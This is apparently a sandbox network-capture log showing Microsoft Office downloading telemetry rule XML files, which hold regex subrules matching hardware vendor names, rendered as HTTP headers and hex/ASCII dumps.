                                                                                                                                                                                    2024-11-29 18:49:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    40192.168.2.64975013.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:32 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:33 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                    x-ms-request-id: c3d74fa2-201e-0003-1d91-3ff85a000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184933Z-174f78459688l8rvhC1EWRtzr00000000cxg00000000azr7
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:33 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    41192.168.2.64975213.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:33 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:33 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 420
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                    ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                    x-ms-request-id: 24c1d4fb-401e-002a-607e-40c62e000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184933Z-174f7845968nxc96hC1EWRspw8000000105g000000001b2b
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:33 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    42192.168.2.64975113.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:33 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:33 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 494
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB8972972"
                                                                                                                                                                                    x-ms-request-id: baa0830a-001e-0082-4291-3f5880000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184933Z-174f78459685m244hC1EWRgp2c000000103g00000000esn4
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:33 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    43192.168.2.64975313.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:33 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:34 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                    ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                    x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184934Z-174f78459685m244hC1EWRgp2c000000105g000000008spy
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:34 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    44192.168.2.64975413.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:34 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:34 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                    ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                    x-ms-request-id: 5810d2d2-301e-0000-6891-3feecc000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184934Z-174f7845968cdxdrhC1EWRg0en00000010a0000000007v4d
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:35 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    45192.168.2.64975613.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:35 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:35 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 486
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                    ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                    x-ms-request-id: fac497c4-501e-008f-4391-3f9054000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184935Z-174f7845968zgtf6hC1EWRqd8s0000000t7000000000fg9b
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:35 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    46192.168.2.64975713.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:35 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:35 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 423
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                    x-ms-request-id: dc0e6055-901e-005b-2d91-3f2005000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184935Z-174f7845968ljs8phC1EWRe6en000000105g00000000anc1
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:35 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    47192.168.2.64975813.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:35 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:35 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 478
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                    ETag: "0x8DC582B9B233827"
                                                                                                                                                                                    x-ms-request-id: 48138194-301e-0020-3858-406299000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184935Z-174f78459685m244hC1EWRgp2c000000107g000000003waa
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:35 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    48192.168.2.64975913.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:36 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:36 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 404
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                    ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                    x-ms-request-id: e52ede4a-001e-0017-0591-3f0c3c000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184936Z-174f7845968xlwnmhC1EWR0sv8000000106g000000006yuw
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:36 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    49192.168.2.64976013.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:36 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:37 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 468
